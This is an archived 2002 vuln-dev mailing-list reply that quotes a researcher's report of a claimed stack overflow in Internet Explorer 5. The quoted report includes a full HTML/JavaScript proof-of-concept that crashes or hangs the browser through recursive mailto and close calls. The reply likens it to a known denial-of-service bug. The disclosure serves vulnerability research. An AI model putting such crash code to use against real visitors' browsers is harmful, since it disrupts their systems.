This seems quite familiar to the "Multiple Vendor JavaScript Interpreter Denial Of Service Vulnerability" reported to Bugtraq in march. http://online.securityfocus.com/bid/4322 Patrik Birgersson > -----Original Message----- > From: Matias Sedalo [mailto:s0t4ipv6at_private] > Sent: 2. juni 2002 23:08 > To: vuln-devat_private > Subject: Buffer Overflow with all versions of Internet Explorer and > Javacript. > > > the 28/07/1999 I have discovered a stack buffer overflow caused by until > the moment all the versions of the Internet Explorer. > In many windows98 causes the necessity to reinitiate the equipment, since > to my to seem it remains without memory. > Only it has been proven in several versions 5 of IE on WindowsNT > server sp6 and windows98 Second Edition. As I said before the Windows 98 > I had to reinitiate it to the force. > Can be possible to execute arbitrary code using the variable company of > the example? > > // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6 > // internet Explorer 5.00.3500.1003 on Windows98se > > -----------cut here--------------------------- > <html><head></head> > <script language="JAVASCRIPT"> > function hacerMail() { > var company; > > crear(); > address="s0t4ipv6at_private"; > soporte(); > } > function soporte(){ > var soporte="billat_private"; > window.location="mailto:"+address+"?cc="+soporte+"&subject="+company; > // window.location=company; // also this line cause the bof. > close(hacerMail()); > } > function crear(){ > company="shellcode here?\n"; // i don't think so. > } > </script> > <input type="button" onClick="hacerMail();" value="SMASH!"></input> > </html> > -----------cut here--------------------------- > > Regards. > > - Internet es perjudicial para la salud - > - Ley N~ 127.0.0.1 > > Matias Sedalo > http://www.shellcode.com.ar > > s0t4ipv6at_private > B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2 > ........................................
This archive was generated by hypermail 2b30 : Mon Jun 03 2002 - 14:33:56 PDT